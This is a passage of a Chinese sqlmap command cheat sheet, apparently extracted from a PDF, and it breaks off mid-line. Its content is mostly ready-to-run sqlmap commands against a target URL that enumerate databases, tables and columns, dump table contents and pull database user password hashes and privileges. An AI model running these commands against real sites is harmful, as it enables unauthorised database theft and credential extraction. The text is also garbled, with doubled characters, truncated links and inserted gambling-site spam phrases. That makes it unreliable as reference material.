sqlmap技术手册.pdf

Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 1 sql sqlmap sql sqlmap 测试许多款ssqqll注入工具 最终还是发现ssqqllmmaapp 最为强悍 谁用谁知道！ sql : ) sql : ) 赶紧抛弃掉手上一大堆ssqqll注入工具吧 :: )) ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405) ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405) 测试环境：uubbuunnttuu 1100..1100 wwiinnddoowwss 77((xx6644)) ssqqllmmaapp//11..00--ddeevv ((r) 如使用过程中出错 请使用下面最近更新的稳定版本: /c0adthmqf1 更新升级 ： sqlmap -update svn checkout /sqlmap/trunk/sqlmap sqlmap-dev 帮助:::: sqlmap -h 官方必威体育精装版文档:/doc/README.html ****************** *************** ****************** *************** ************************************基本步骤****************************** sqlmap -u http://url/news?id=1 --current-user #获取当前用户名称 sqlmap -u /news?id=1 --current-db #获取当前数 据库名称 sqlmap -u /news?id=1 --tables -D db_name #列 表名 sqlmap -u http://url/news?id=1 --columns -T tablename users-D db_name -v 0 #列字段 sqlmap -u http://url/news?id=1 --dump -C column_name -T table_name -D db_name -v 0 #获取字段内容 更多技术信息请访问:/nginxshell Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 2 ****************** ****************** ****************** ****************** ************************************信息获取************************************ sqlmap -u http://url/news?id=1 --dbms Mysql --users # dbms 指定数 据库类型 sqlmap -u http://url/news?id=1 --users #列数据库用户 sqlmap -u http://url/news?id=1 --dbs#列数据库 sqlmap -u http://url/news?id=1 --passwords #数据库用户密码 sqlmap -u http://url/news?id=1 --passwords-U root -v 0 #列出指定用户 数据库密码 sqlmap -u http://url/news?id=1 --dump -C password,user,id -T tablename -D db_name --start 1 --stop 20 #列出指定字段，列出20 条 sqlmap -u http://url/news?id=1 --dump-all -v 0 #列出所有数据库所有表 sqlmap -u http://url/news?id=1 --privileges #查看权限 sqlmap -u